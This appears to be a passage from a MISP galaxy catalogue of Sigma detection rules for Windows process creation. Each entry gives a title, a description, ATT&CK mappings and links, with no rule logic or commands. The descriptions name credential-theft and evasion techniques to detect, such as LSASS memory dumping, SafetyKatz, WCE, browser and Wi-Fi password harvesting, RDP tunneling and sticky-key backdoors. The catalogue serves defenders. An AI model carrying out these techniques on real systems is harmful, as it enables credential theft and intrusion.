https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml

Automated Collection Command Prompt

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

The tag is: misp-galaxy:sigma-rules="Automated Collection Command Prompt"

Automated Collection Command Prompt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 10456. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_automated_collection.yml

Renamed Remote Utilities RAT (RURAT) Execution

Detects execution of renamed Remote Utilities (RURAT) via Product PE header field

The tag is: misp-galaxy:sigma-rules="Renamed Remote Utilities RAT (RURAT) Execution"

Table 10457. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml

Uncommon Child Process Spawned By Odbcconf.EXE

Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn’t have any child processes.

The tag is: misp-galaxy:sigma-rules="Uncommon Child Process Spawned By Odbcconf.EXE"

Uncommon Child Process Spawned By Odbcconf.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

Table 10458. Table References

Links

https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16

https://medium.com/@cyberjyot/t1218-008-dll-execution-using-odbcconf-exe-803fa9e08dac

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml

AspNetCompiler Execution

Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.

The tag is: misp-galaxy:sigma-rules="AspNetCompiler Execution"

AspNetCompiler Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10460. Table References

Links

https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/

https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml

Suspicious Msiexec Quiet Install From Remote Location

Detects usage of Msiexec.exe to quietly install packages hosted at a remote location.

The tag is: misp-galaxy:sigma-rules="Suspicious Msiexec Quiet Install From Remote Location"

Suspicious Msiexec Quiet Install From Remote Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

Table 10461. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml

HackTool - Pypykatz Credentials Dumping Activity

Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through the Windows registry, where the SAM database is stored.

The tag is: misp-galaxy:sigma-rules="HackTool - Pypykatz Credentials Dumping Activity"

HackTool - Pypykatz Credentials Dumping Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 10462. Table References

Links

https://github.com/skelsec/pypykatz

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_pypykatz.yml

HackTool - CreateMiniDump Execution

Detects the use of the CreateMiniDump hack tool, which dumps the LSASS process memory so that credentials can be extracted on the attacker's machine.

The tag is: misp-galaxy:sigma-rules="HackTool - CreateMiniDump Execution"

HackTool - CreateMiniDump Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10463. Table References

Links

https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml

File Download via CertOC.EXE

Detects when a user downloads a file by using CertOC.exe

The tag is: misp-galaxy:sigma-rules="File Download via CertOC.EXE"

File Download via CertOC.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10464. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Certoc/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_download.yml

Outlook EnableUnsafeClientMailRules Setting Enabled

Detects an attacker trying to enable the Outlook security setting "EnableUnsafeClientMailRules", which allows Outlook mail rules to start applications or run macros.

The tag is: misp-galaxy:sigma-rules="Outlook EnableUnsafeClientMailRules Setting Enabled"

Outlook EnableUnsafeClientMailRules Setting Enabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10465. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44

https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048

https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml

RDP Port Forwarding Rule Added Via Netsh.EXE

Detects the execution of netsh to configure a port forwarding rule for port 3389 (RDP).

The tag is: misp-galaxy:sigma-rules="RDP Port Forwarding Rule Added Via Netsh.EXE"

RDP Port Forwarding Rule Added Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 10466. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml

PowerShell Get-Clipboard Cmdlet Via CLI

Detects usage of the 'Get-Clipboard' cmdlet via CLI

The tag is: misp-galaxy:sigma-rules="PowerShell Get-Clipboard Cmdlet Via CLI"

PowerShell Get-Clipboard Cmdlet Via CLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

Table 10467. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md

https://github.com/OTRF/detection-hackathon-apt29/issues/16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml

Potentially Suspicious Cabinet File Expansion

Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. as seen in the Iranian MeteorExpress-related attacks.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Cabinet File Expansion"

Potentially Suspicious Cabinet File Expansion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10468. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/

https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml

Use Short Name Path in Command Line

Detects the use of Windows 8.3 short names in a command line, which can be used as a method to evade command-line based detection.

The tag is: misp-galaxy:sigma-rules="Use Short Name Path in Command Line"

Use Short Name Path in Command Line has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10469. Table References

Links

https://twitter.com/frack113/status/1555830623633375232

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN

https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml

Loaded Module Enumeration Via Tasklist.EXE

Detects the enumeration of a specific DLL or EXE in use by a process via "tasklist.exe". Attackers often use this to find the process identifier (PID) of the process that has loaded the DLL in question, in order to dump its memory or perform other nefarious actions.

The tag is: misp-galaxy:sigma-rules="Loaded Module Enumeration Via Tasklist.EXE"

Loaded Module Enumeration Via Tasklist.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10470. Table References

Links

https://pentestlab.blog/tag/svchost/

https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tasklist_module_enumeration.yml

Renamed Cloudflared.EXE Execution

Detects the execution of a renamed "cloudflared" binary.

The tag is: misp-galaxy:sigma-rules="Renamed Cloudflared.EXE Execution"

Renamed Cloudflared.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

Table 10471. Table References

Links

https://github.com/cloudflare/cloudflared/releases

https://github.com/cloudflare/cloudflared

https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/

https://www.intrinsec.com/akira_ransomware/

https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_cloudflared.yml

Chopper Webshell Process Pattern

Detects patterns found in process executions caused by China Chopper-like tiny (ASPX) webshells.

The tag is: misp-galaxy:sigma-rules="Chopper Webshell Process Pattern"

Chopper Webshell Process Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 10472. Table References

Links

https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml

Potential Binary Proxy Execution Via VSDiagnostics.EXE

Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries.

The tag is: misp-galaxy:sigma-rules="Potential Binary Proxy Execution Via VSDiagnostics.EXE"

Potential Binary Proxy Execution Via VSDiagnostics.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10473. Table References

Links

https://twitter.com/0xBoku/status/1679200664013135872

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml

Potential Signing Bypass Via Windows Developer Features

Detects when a user enables developer features such as "Developer Mode" or "Application Sideloading", which allow the user to install untrusted packages.

The tag is: misp-galaxy:sigma-rules="Potential Signing Bypass Via Windows Developer Features"

Table 10474. Table References

Links

Internal Research

https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml

Process Memory Dump Via Comsvcs.DLL

Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)

The tag is: misp-galaxy:sigma-rules="Process Memory Dump Via Comsvcs.DLL"

Process Memory Dump Via Comsvcs.DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10475. Table References

Links

https://twitter.com/Wietze/status/1542107456507203586

https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/

https://twitter.com/pythonresponder/status/1385064506049630211?s=21

https://twitter.com/SBousseaden/status/1167417096374050817

https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py

https://twitter.com/shantanukhande/status/1229348874298388484

https://twitter.com/Hexacorn/status/1224848930795552769

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml

PUA - WebBrowserPassView Execution

Detects the execution of WebBrowserPassView.exe, a password recovery tool that reveals the passwords stored by the following web browsers: Internet Explorer (versions 4.0 to 11.0), Mozilla Firefox (all versions), Google Chrome, Safari, and Opera.

The tag is: misp-galaxy:sigma-rules="PUA - WebBrowserPassView Execution"

PUA - WebBrowserPassView Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 10476. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_webbrowserpassview.yml

User Discovery And Export Via Get-ADUser Cmdlet

Detects usage of the Get-ADUser cmdlet to collect user information and write it to a file.

The tag is: misp-galaxy:sigma-rules="User Discovery And Export Via Get-ADUser Cmdlet"

User Discovery And Export Via Get-ADUser Cmdlet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10477. Table References

Links

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml

Potential Defense Evasion Via Rename Of Highly Relevant Binaries

Detects the execution of a renamed binary often used by attackers or malware, leveraging the Sysmon OriginalFileName data point.

The tag is: misp-galaxy:sigma-rules="Potential Defense Evasion Via Rename Of Highly Relevant Binaries"

Potential Defense Evasion Via Rename Of Highly Relevant Binaries has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10478. Table References

Links

https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html

https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html

https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/

https://twitter.com/christophetd/status/1164506034720952320

https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml

HackTool - SafetyKatz Execution

Detects the execution of the hacktool SafetyKatz via PE information and its default image name.

The tag is: misp-galaxy:sigma-rules="HackTool - SafetyKatz Execution"

HackTool - SafetyKatz Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10479. Table References

Links

https://github.com/GhostPack/SafetyKatz

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_safetykatz.yml

Harvesting Of Wifi Credentials Via Netsh.EXE

Detects the harvesting of Wi-Fi credentials using netsh.exe.

The tag is: misp-galaxy:sigma-rules="Harvesting Of Wifi Credentials Via Netsh.EXE"

Harvesting Of Wifi Credentials Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 10480. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml

PUA - Advanced IP Scanner Execution

Detects the use of Advanced IP Scanner, which appears to be a popular tool among ransomware groups.

The tag is: misp-galaxy:sigma-rules="PUA - Advanced IP Scanner Execution"

PUA - Advanced IP Scanner Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

Table 10481. Table References

Links

https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer

https://labs.f-secure.com/blog/prelude-to-ransomware-systembc

https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf

https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html

https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner

https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml

IIS Native-Code Module Command Line Installation

Detects suspicious IIS native-code module installations via command line

The tag is: misp-galaxy:sigma-rules="IIS Native-Code Module Command Line Installation"

IIS Native-Code Module Command Line Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 10482. Table References

Links

https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/

https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml

Potentially Suspicious Rundll32 Activity

Detects suspicious execution of rundll32 with specific calls to DLLs that have known LOLBIN functionality.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Rundll32 Activity"

Potentially Suspicious Rundll32 Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10483. Table References

Links

https://twitter.com/nas_bench/status/1433344116071583746

http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/

https://twitter.com/eral4m/status/1479080793003671557

https://twitter.com/Hexacorn/status/885258886428725250

https://twitter.com/eral4m/status/1479106975967240209

https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml

Suspicious SYSVOL Domain Group Policy Access

Detects access to domain Group Policies stored in SYSVOL.

The tag is: misp-galaxy:sigma-rules="Suspicious SYSVOL Domain Group Policy Access"

Suspicious SYSVOL Domain Group Policy Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"

Table 10484. Table References

Links

https://adsecurity.org/?p=2288

https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml

Exports Critical Registry Keys To a File

Detects the export of a critical registry key to a file.

The tag is: misp-galaxy:sigma-rules="Exports Critical Registry Keys To a File"

Exports Critical Registry Keys To a File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 10485. Table References

Links

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://lolbas-project.github.io/lolbas/Binaries/Regedit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml

Wab/Wabmig Unusual Parent Or Child Processes

Detects unusual parent or child processes of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool), as seen in Bumblebee activity.

The tag is: misp-galaxy:sigma-rules="Wab/Wabmig Unusual Parent Or Child Processes"

Table 10486. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime

https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml

HackTool - Windows Credential Editor (WCE) Execution

Detects the use of Windows Credential Editor (WCE)

The tag is: misp-galaxy:sigma-rules="HackTool - Windows Credential Editor (WCE) Execution"

HackTool - Windows Credential Editor (WCE) Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10487. Table References

Links

https://www.ampliasecurity.com/research/windows-credentials-editor/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_wce.yml

Suspicious ZipExec Execution

Detects the execution of ZipExec, a proof-of-concept (PoC) tool that wraps binary-based tools into a password-protected zip file.

The tag is: misp-galaxy:sigma-rules="Suspicious ZipExec Execution"

Suspicious ZipExec Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10488. Table References

Links

https://twitter.com/SBousseaden/status/1451237393017839616

https://github.com/Tylous/ZipExec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_zipexec.yml

Execute Code with Pester.bat as Parent

Detects code execution via Pester.bat (Pester is a PowerShell module for testing).

The tag is: misp-galaxy:sigma-rules="Execute Code with Pester.bat as Parent"

Execute Code with Pester.bat as Parent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10489. Table References

Links

https://twitter.com/Oddvarmoe/status/993383596244258816

https://twitter.com/st0pp3r/status/1560072680887525378

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pester.yml

Explorer NOUACCHECK Flag

Detects suspicious starts of explorer.exe with the /NOUACCHECK flag, which allows all sub-processes of the newly started explorer.exe to run without any UAC checks.

The tag is: misp-galaxy:sigma-rules="Explorer NOUACCHECK Flag"

Explorer NOUACCHECK Flag has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10490. Table References

Links

https://twitter.com/ORCA6665/status/1496478087244095491

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_nouaccheck.yml

XBAP Execution From Uncommon Locations Via PresentationHost.EXE

Detects the execution of ".xbap" (Browser Application) files via PresentationHost.EXE from an uncommon location. This can be abused to run malicious ".xbap" files and bypass application whitelisting (AWL).

The tag is: misp-galaxy:sigma-rules="XBAP Execution From Uncommon Locations Via PresentationHost.EXE"

XBAP Execution From Uncommon Locations Via PresentationHost.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10491. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml

Set Suspicious Files as System Files Using Attrib.EXE

Detects the usage of attrib with the "+s" option to mark scripts or executables located in suspicious locations as system files, hiding them from users and preventing their deletion with ordinary user rights. The rule limits the search to specific extensions and directories to avoid false positives.

The tag is: misp-galaxy:sigma-rules="Set Suspicious Files as System Files Using Attrib.EXE"

Set Suspicious Files as System Files Using Attrib.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 10492. Table References

Links

https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4

https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/

https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml

User Added To Highly Privileged Group

Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".

The tag is: misp-galaxy:sigma-rules="User Added To Highly Privileged Group"

User Added To Highly Privileged Group has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 10493. Table References

Links

https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_privileged_group.yml

Suspicious Debugger Registration Cmdline

Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).

The tag is: misp-galaxy:sigma-rules="Suspicious Debugger Registration Cmdline"

Suspicious Debugger Registration Cmdline has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

Table 10494. Table References

Links

https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/

https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml

Potential Remote Desktop Tunneling

Detects potential use of an SSH utility to establish RDP over a reverse SSH tunnel. Attackers can use this to route network packets that would otherwise not reach their intended destination.

The tag is: misp-galaxy:sigma-rules="Potential Remote Desktop Tunneling"

Potential Remote Desktop Tunneling has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"

Table 10495. Table References

Links

https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml

Potential Defense Evasion Via Binary Rename

Detects the execution of a renamed binary often used by attackers or malware, leveraging the Sysmon OriginalFileName data point.

The tag is: misp-galaxy:sigma-rules="Potential Defense Evasion Via Binary Rename"

Potential Defense Evasion Via Binary Rename has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10496. Table References

Links

https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html

https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html

https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml

User Added to Remote Desktop Users Group

Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".

The tag is: misp-galaxy:sigma-rules="User Added to Remote Desktop Users Group"

User Added to Remote Desktop Users Group has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 10497. Table References

Links

https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml

Control Panel Items

